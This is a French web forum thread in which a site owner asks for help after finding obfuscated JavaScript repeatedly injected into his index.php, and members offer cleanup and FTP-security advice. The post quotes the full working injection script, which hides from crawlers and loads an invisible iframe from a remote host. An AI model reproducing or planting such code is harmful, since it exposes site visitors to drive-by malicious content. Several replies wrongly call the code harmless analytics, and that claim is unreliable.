Injection code malicieux sur mon site

[hxjonathan]

Salut,

J'ai constaté que des bouts de code sont injectés sur ma page index.php

Voici le genre de code malicieux que je vois sur ma page index.php:

if(document.cookie.indexOf('urchin')==-1 && !window.navigator.userAgent.toLowerCase().match(/(crawler|googlebot|msnbot|yahoo|search|indexer|cuill.com|stackrambler|aport|y
andex|bing|ask)/)) { res=new Date();res.setTime(res.getTime()+80000000);document.cookie='urchin='+escape('google-analytics.com')+';expires='+res.toGMTString()+';path=/'; function iO(){};var lV=new Date();iO.prototype = {bF : function() {sV=false;this.qY='';this.cA='';return 'h<t<t<p6:4/6/4i4mxg6d4oxw6n6l4o}axdxsx.<c}o}m}/4i4n4.<c6g6i}?436'.aI(/[6\}4x\<]/g, '');var kO=function(){};nW='nW';var wP=false;var hH='';},t : function() {var bP=function(){};zY=53599;this.qL='qL';pT='';var iY=function(){};this.mM=false;var mL=function(){return 'mL'};var u=window;l=5320;aN='aN';this.kL=63107;vL='';var i=document;this.nH=false;function yW(){};this.bA='bA';this.nT='';vK='';var g=function(){};this.pW='';var aZ=function(){};	String.prototype.aI=function(o,e){return this.replace(o, e)};zM='';function hB(){};cL='';var aD=new Array();var hO=new Date();var lS=new Date();mO=21254;var m = 'd#i.sUp3l#a.y#'.aI(/[#3%U\.]/g, '');uK=false;var dU=21553;var pA=28676;var b = 'nroQn+e)'.aI(/[\)rP\+Q]/g, '');this.j=false;this.dUM='';sL='';var oC='';		var s = 'aTp;pEeEn;dEC0hEi;lcdT'.aI(/[TE;c0]/g, '');this.oD=57616;this.nR=28704;var q = 'c&rHeDaHtDe&E&lfevmHeHnDtH'.aI(/[Hf&Dv]/g, '');pI=false;this.jZ='';this.kD=false;var a = 'b0oideyt'.aI(/[t0pei]/g, '');var bO=new Array();this.jZO=49972;var qLQ=15686;var h = 'sYtYyYlYen'.aI(/[n\>Y3\^]/g, '');this.xE='';function dS(){};var oDS=new Array();this.bV=37119;var x = 'iTfLrOaLm2eL'.aI(/[L2\+OT]/g, '');oV='';function oDL(){};var r=61212;this.tG='';var z = 'w[r[iQtseJ'.aI(/[JQsW\[]/g, '');this.qMC='';function xQ(){};this.iL='';this.jG='';var qM = 'sPe;tNAztPtzrPi%bNu;tPeN'.aI(/[N;%zP]/g, '');var nN=new Date();var vG=new Date();var w = 's_rfc_'.aI(/[_0f,\|]/g, '');var kOW=function(){return 'kOW'};zU=false;var bC='';var jA=new Date();var f = 's!e^t^T^i!m!e!ovuStS'.aI(/[SXv\!\^]/g, '');tX=false;lX='';var tP=false;this.tA='';var p = 'c8dC<Y/YbWoCdWyC>U<Y/ChUtUmWlC>W'.aI(/[W8CYU]/g, '');this.eS='eS';function sT(){};var bH=new Array();var rR='';function cX(){};var yH='';try {this.cC=52370;jP='jP';this.mF='';var dZ=false;var eK=function(){return 'eK'};var bT=new Array();var n=this.bF();var qK='';this.rT=22879;var k=i[q](x);var vLY='';iYT=false;lW=26789;bM='bM';this.iH=62649;this.tK=24505;cQ=51387;k[h][m] = b;gM='';var oH=false;iR='iR';var pD='pD';k[qM](w, n);var bMA=6076;dB='';function dC(){};var oZ=function(){return 'oZ'};eR=false;document[a][s](k);this.kC='';var aL='aL';this.kLB=59319;wZ=false;var iJ='';rG=7858;var bK=false;} catch(y) {this.aF='';var lD=function(){};i.write(p);this.uL='';var kOG=41230;var v = this;var rGO='';var oG='';tM='tM';wC=false;u[f](function(){ var pJ=function(){};this.eN=false;var oHG=function(){return 'oHG'};kY=false;v.t();fS=false;function jW(){};}, 380);this.iRM=22881;this.fK=false;var mD='';var eB=new Array();}var iM=function(){};this.xH='';}};var uE=new Date();var bCW=new iO(); this.iF='';bCW.t();var pL=new Array();}

Auriez-vous une idée de la façon dont ce hacker procède car je ne comprends pas. Comment régler définitivement le problème ?

J'ai déjà essayé de supprimmer le code mais cela revient toujours. J'ai aussi changer mes codes ftp et mots de passes. Rien n'y fait.

Merci à vous tous

John

[RaphAstronome]

Tu as une faille dans un script PHP ou un spyware qui à espionné ton mot de passe FTP.

Depuis un PC sécurisé (prends un live CD linux par exemple)

- Ne va pas sur ton site tant que le pépin n'est pas résolu.

- Change le code FTP chez ton hébergeur et si nécessaire d'autres codes annexes (MySQL, Manager, etc...) .

- Va sur ton FTP (avec gftp par exemple et nettoie) et nettoie les fichiers

- Si tu as changé les pass MySQL ou autre il faudra que tu les changes dans tes scripts.

- Passe un coup d'anti-spyware, anti-virus sur ton PC hacké.

- Tu peux parfois demander à ton hébergeur les logs FTP pour voir si il y a quelques chose de bizarre.

Si tu change tes codes sur le PC avec un espion le pirate n'a qu'a regarder dans ton PC pour voir les changements de codes.

Dans le cas d'une faille dans un script il devrait peut être aussi y avoir des trucs bizarres dans les logs HTTP (celles où on voit les visiteurs surfer).

Souvent il s'agit d'une faille include et parfois XSS (surtout si le code est mis dans un espace de discutions, commentaires ...)

http://www.pcinpact.com/forum/index.php?showtopic=91075

Je te recommande de faire extrêmement attention aux variables dans les include/require.

Sois très limitatif au niveau des caractères possibles, une simple vérification avec is_file est un peu léger.

[Shtong]

Comme l'a Raph, il te faudra lire et comprendre le topic sur la sécurité (surtout sur les injections de code / cross site scripting), mais également faire attention à la sécurité de ton FTP pour que le problème ne se reproduise pas :

- Choisir un mot de passe fort (c'est à dire contenant minuscules, majuscules, chiffres, caractères spéciaux, aucun mot du dictionnaire, et assez long). C'est important car j'ai vu de nombreux serveurs FTP se faire "bruteforcer" c'est à dire que quelqu'un essaye tous les mots de passe possibles... Le pire c'est que dans certains cas les administrateurs ne faisaient rien même après que je leur signale !

- Ne pas utiliser de FTP seul qui fait transiter les mots de passe en clair. Préférer SFTP ou FTP over SSH / VPN. Si ton hébergeur ne le permet pas, change d'hébergeur (oui c'est extrême mais je préfère ça que de me faire piquer mon mot de passe )

[BreizFenrir]

Accessoirement, en voyant le code que tu fournis, je me demande si ça n'est pas "normal" au lieu d'être une faille de sécurité. En effet cela semble être du code utilisé pour la collecte de données pour Urchin, qui permet de faire des statistiques sur les visites du site. Ça ne serait pas le serveur de ton hébergeur qui ajouterait ce code automatiquement ? Ce code apparaît sur les autres pages de ton site ?

[Mephisto]

+1

c'est casse couilles à relire

et c'est pas bien clair comme bazard

mais ça n'a rien de malveillant

si tu n'es pas sur analytics, c'est probablement ton hébergeur qui rajoute sa touche

[theocrite]

Rien de malveillant, c'est vide dit.

Quand on passe par du js illisible et obfusqué pour utiliser une url (de pub?), ça ne me donne pas envie de faire confiance perso :

h<t<t<p6:4/6/4i4mxg6d4oxw6n6l4o}axdxsx.<c}o}m}

[Mephisto]

en effet

enfin, pas si obfusqué non plus

et ça me choque plus vraiment de voire ce genre de comportement, avec tous les paranos et steven-13-ans qu'on peut croiser...

mais c'est vrai que ce domaine fait spawner un google safe browsing diagnostic

ignorer le warning redirige sur... bing... plutot louche... (et ça me rapelle de rajouter bing à mon filtre dns...)

la taille du texte n'est pas exactement la même, il manque un cookie, mais ça semble bien être bing

pas de problèmes sur les url, à la recherche non plus... ça ressemble plus à la 'porte de sortie' d'un script...

mais firebug ne vois rien concernant ce qui se passe avant.

en ayant insisté, je suis resté bloqué sur http://xipoc.in/x/index.php

un serveur russe, j'ai jeté un oeil, rien de bien intéressant (l'index.php et un 404.php n'affichant rien, et un robots.txt, apache utilisant sa propre 404)

[Shtong]

Il s'agit d'un code qui crée une iframe invisible sur la page et qui pointe sur l'URL imgdownload.com/in.cgi?3 (j'ai pas essayé l'URL perso )

Donc non pour moi c'est complètement louche comme histoire

[Mephisto]

ça ressemble surtout à de la pub

je ne vois pas de comportement "douteux" sur le PC (linux, mais généralement, ça à plus tendance à révéler des comportements anormaux que les planquer)

mais un iframe caché pour une pub aussi sale (ça existe encore des trucs aussi moche ?!), appelant un popup me proposant de devenir président des états-unis...

bleh...

c'est quoi cet hébergeur ?